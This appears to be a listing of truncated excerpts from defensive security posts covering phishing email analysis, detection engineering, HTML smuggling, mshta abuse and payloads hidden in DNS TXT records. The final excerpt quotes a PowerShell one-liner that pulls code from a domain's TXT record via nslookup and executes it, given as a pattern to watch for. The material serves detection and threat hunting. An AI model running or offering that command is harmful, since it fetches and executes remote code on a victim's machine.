I divided this analysis into four pieces to help us better understand the investigation flow. Email address Before investigation always drill down the email address further in 3 parts for detaile...

It presents an assortment of improved workflows for defense security, specifically addressing the areas of detection engineering, threat hunting, reverse engineering, and digital forensics. The pri...

HTML-Smuggling HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside of seemingly benign...

Mshta is attractive to adversaries both in the early and latter stages of an infection because it enables them to proxy the execution of arbitrary code through a trusted utility. Process and comman...

Windows Malicious Payload in DNS Txt Attacker can put malicious payload in DNS TXT record content of domain. So, watch out for: powershell . (nslookup -q=txt some.domain.com)[-1] Curl with ca...